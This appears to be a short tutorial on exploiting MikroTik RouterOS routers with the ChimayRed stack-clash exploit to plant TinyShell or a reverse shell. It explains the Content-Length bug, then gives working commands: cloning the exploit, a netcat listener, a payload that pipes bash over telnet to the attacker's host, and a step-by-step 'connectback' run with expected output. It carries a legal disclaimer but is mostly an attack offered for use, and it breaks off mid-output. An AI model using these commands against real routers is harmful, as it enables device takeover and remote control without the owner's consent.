The author does not hold any responsibility about the bad use of this script, remember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.
ChimayRed (CR) is an exploit that is used against MikroTik (MT) routers running RouterOS. It is used to upload a payload such as HIVE or TinyShell onto the MT router. This guide explains how to utilize ChimayRed to upload the TinyShell payload to the MikroTik router.
+ Python 2.7.x
What really happens?
+ The content_length_value is subtracted from the stack pointer register.
+ If we pass a big number bigger than 130000 and smaller than 2147483647 the stack pointer will point out of the stack, and the first PUSH will generate a SEGFAULT.
+ If we pass a negative number (or a number from 2147483648 [-2147483648] to 4294967295 [-1]), the space on the stack won’t be reserved because the stack pointer will be incremented instead of decremented.
git clone https://github.com/BigNerd95/Chimay-Red && cd https://github.com/BigNerd95/Chimay-Red Where: – RouterOS IP: 192.168.1.1 – PC IP: 192.168.1.5 nc -l -p 1234 ./StackClashROPsystem.py 192.168.1.1 www_binary “/bin/mknod /ram/f p; /bin/telnet 192.168.1.5 1234 < /ram/f | /bin/bash > /ram/f 2>&1” or Step-by-step guide 1. Verify that the MikroTik is running RouterOS 6.X 2. Verify python version 2.7 is installed 3. Determine the ICON IP Address 4. Go to ChimayRed bin directory a. /home/ubuntu/Desktop/ChimayRed_v3.7/bin 5. Exploit RB 493G using ChimayRed. a. python chimay_red.py -t 172.20.100.6:80 connectback -l 172.20.12.23 -p 4242 6. The following output should be observed, which confirms successfully exploitation: a. [+] Connecting to: 172.20.100.6:80 b. [+] Detected RouterOS: 6.27 c. [+] Detected architecture: mipsbe d. [+] 0 seconds until Web server is reset. e. [+] Web server reset. f. [+] Connecting to